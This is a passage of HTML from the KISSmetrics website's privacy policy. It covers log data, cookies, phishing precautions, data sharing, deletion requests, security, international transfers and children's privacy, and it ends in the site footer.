information that may be of interest to you. If you decide at any time that you no longer wish to receive such communications from us, please follow the unsubscribe instructions provided in any of the communications or update your "user preferences" information. (See "<b>Changing or Deleting Information</b>," below.)</li> </ul> <p><i>Log Data.</i> When you visit the Site, whether as a KISSmetrics Customer or a non-registered user just browsing (any of these, a "<b>KISSmetrics User</b>"), our servers automatically record information that your browser sends whenever you visit a website ("<b>Log Data</b>"). This Log Data may include information such as your computer’s Internet Protocol ("<b>IP</b>") address, browser type or the webpage you were visiting before you came to our Site, pages of our Site that you visit, the time spent on those pages, information you search for on our Site, access times and dates, and other statistics. We use this information to monitor and analyze use of the Site and the Service and for the Site’s technical administration, to increase our Site’s functionality and user-friendliness, and to better tailor it to our visitors’ needs.</p> <h3>Cookies</h3> <p>Like many websites, we use "cookies" to collect information. A cookie is a small data file that we transfer to your computer’s hard disk for record-keeping purposes. We use cookies for two purposes. First, we utilize persistent cookies to save your registration ID and login password for future logins to the Site. Second, we utilize session ID cookies to enable certain features of the Site, to better understand how you interact with the Site and to monitor aggregate usage by KISSmetrics Users and web traffic routing on the Site. Unlike persistent cookies, session cookies are deleted from your computer when you log off from the Site and Service and then close your browser. Third-party advertisers on the Site may also place or read cookies on your browser. You can instruct your browser, by changing its options, to stop accepting cookies or to prompt you before accepting a cookie from the websites you visit. If you do not accept cookies, however, you may not be able to use all portions of the Site or all functionality of the Service.</p> <h3>Phishing</h3> <p>Identity theft and the practice currently known as "phishing" are of great concern to KISSmetrics. Safeguarding information to help protect you from identity theft is a top priority. We do not and will not, at any time, request your credit card information, your account ID, login password, or national identification numbers in a non-secure or unsolicited e-mail or telephone communication. For more information about phishing, visit the Federal Trade Commission’s website.</p> <h3>Information Sharing and Disclosure</h3> <p><i>Aggregate Information and Non-Identifying Information.</i> We may share aggregated information that does not include personally identifiable information and we may otherwise disclose non-identifying Information and Log Data with third parties for industry analysis, demographic profiling and other purposes. Any aggregated information shared in these contexts will not contain your personally identifiable information.</p> <p><i>Service Providers.</i> We may employ third-party companies and individuals to facilitate our Site and Service, to provide the Service on our behalf, to perform Site-related services (e.g., without limitation, maintenance services, database management, web analytics and improvement of the Site’s features) or to assist us in analyzing how our Site and Service are used. These third parties have access to your personally identifiable information only to perform these tasks on our behalf and are obligated not to disclose or use it for any other purpose.</p> <p><i>Compliance with Laws and Law Enforcement.</i> KISSmetrics cooperates with government and law enforcement officials and private parties to enforce and comply with the law. We will disclose any information about you to government or law enforcement officials or private parties as we, in our sole discretion, believe necessary or appropriate to respond to claims and legal process (including but not limited to subpoenas), to protect the property and rights of KISSmetrics or a third party, to protect the safety of the public or any person, or to prevent or stop activity we may consider to be, or to pose a risk of being, any illegal, unethical or legally actionable activity. </p> <p><i>Business Transfers.</i> KISSmetrics may sell, transfer or otherwise share some or all of its assets, including your personally identifiable information, in connection with a merger, acquisition, reorganization or sale of assets or in the event of bankruptcy. </p> <h3>Changing or Deleting Your Information</h3> <p>All KISSmetrics Customers may review, update, correct or delete the personally identifiable information in their registration profile by contacting us. If you completely delete all such information, then your account may become deactivated. If you would like us to delete your record in our system, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a> with a request that we delete your personally identifiable information from our database. We will use commercially reasonable efforts to honor your request. We may retain an archived copy of your records as required by law or for legitimate business purposes.</p> <h3>Security</h3> <p>KISSmetrics is very concerned with safeguarding your information. We employ administrative, physical and electronic measures designed to protect your information from unauthorized access.</p> <p>We will make any legally required disclosures of any breach of the security, confidentiality, or integrity of your unencrypted electronically stored "personal data" (as defined in applicable state statutes on security breach notification) to you via email or conspicuous posting on this Site in the most expedient time possible and without unreasonable delay, insofar as consistent with (i) the legitimate needs of law enforcement or (ii) any measures necessary to determine the scope of the breach and restore the reasonable integrity of the data system.</p> <h3>International Transfer</h3> <p>Your information may be transferred to — and maintained on — computers located outside of your state, province, country or other governmental jurisdiction where the privacy laws may not be as protective as those in your jurisdiction. If you are located outside the United States and choose to provide information to us, KISSmetrics transfers personally identifiable information to the United States and processes it there. Your consent to this Privacy Policy followed by your submission of such information represents your agreement to that transfer.</p> <h3>Links to Other Sites</h3> <p>Our Site contains links to other websites. If you choose to visit a third party website, e.g. an advertiser by "clicking on" a banner ad or other type of advertisement, or click on another third-party link, you will be directed to that third party’s website. The fact that we link to a website or present a banner ad or other type of advertisement is not an endorsement, authorization or representation of our affiliation with that third party, nor is it an endorsement of their privacy or information security policies or practices. We do not exercise control over third-party websites. These other websites may place their own cookies or other files on your computer, collect data or solicit personal information from you. Other sites follow different rules regarding the use or disclosure of the personal information you submit to them. We encourage you to read the privacy policies or statements of the other websites you visit.</p> <h3>Our Policy Toward Children</h3> <p>Our Site and Service is not directed to children under 13. We do not knowingly collect personally identifiable information from children under 13. If a parent or guardian becomes aware that his or her child has provided us with personally identifiable information without their consent, he or she should contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>. If we become aware that a child under 13 has provided us with personally identifiable information, we will delete such information from our files.</p> <h3>Aligning Your Privacy Policy With Our Tools</h3> <p>For information on how you can align your KISSmetrics installation with your privacy policy please <a href="http://support.kissmetrics.com/misc/user-privacy">see here</a>.</p> <h3>Contacting Us</h3> <p>If you have any questions about this Privacy Policy, please contact us at <a href="mailto:privacy@kissmetrics.com">privacy@kissmetrics.com</a>.</p></div><!-- /.wrap --> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav&..